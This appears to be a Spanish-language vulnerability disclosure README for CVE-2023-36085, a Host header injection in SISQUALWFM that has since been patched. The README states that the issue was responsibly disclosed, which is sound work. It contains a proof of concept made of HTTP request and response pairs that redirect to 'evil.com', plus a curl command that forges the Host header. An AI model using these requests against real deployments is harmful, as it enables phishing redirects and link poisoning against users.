
Este repositorio contiene información relacionada con CVE-2023-36085, una vulnerabilidad de inyección de cabecera de host descubierta en SISQUALWFM versión 7.1.319.103, que permite a un atacante manipular enlaces de páginas web o redirigir a los usuarios a un sitio malicioso. A esta vulnerabilidad se le asignó CVE-2023-36085 y ha sido corregida en la versión 7.1.319.111 y superiores.
Este repositorio contiene información relacionada con una vulnerabilidad de inyección de cabecera Host descubierta en SISQUALWFM versión 7.1.319.103, que permite a un atacante manipular enlaces de páginas web o redirigir a los usuarios a un sitio malicioso. A esta vulnerabilidad se le asignó el CVE-2023-36085 y se ha corregido en la versión 7.1.319.111 y superiores.
Proporcionamos un escenario de prueba de concepto que demuestra la vulnerabilidad de inyección de cabecera Host, específicamente dirigido al endpoint /sisqualIdentityServer/core. Esta vulnerabilidad permite a un atacante manipular enlaces de páginas web o redirigir a los usuarios a otro sitio alterando la cabecera Host.
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...

Para explotar esta vulnerabilidad, un atacante puede usar el siguiente comando curl para modificar la cabecera Host:
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
Este repositorio es solo para fines informativos y no debe utilizarse para ninguna actividad maliciosa. La vulnerabilidad ha sido divulgada de manera responsable al proveedor y el problema ha sido resuelto. Es crucial seguir las pautas de hacking ético y respetar las prácticas de divulgación responsable al identificar y reportar vulnerabilidades.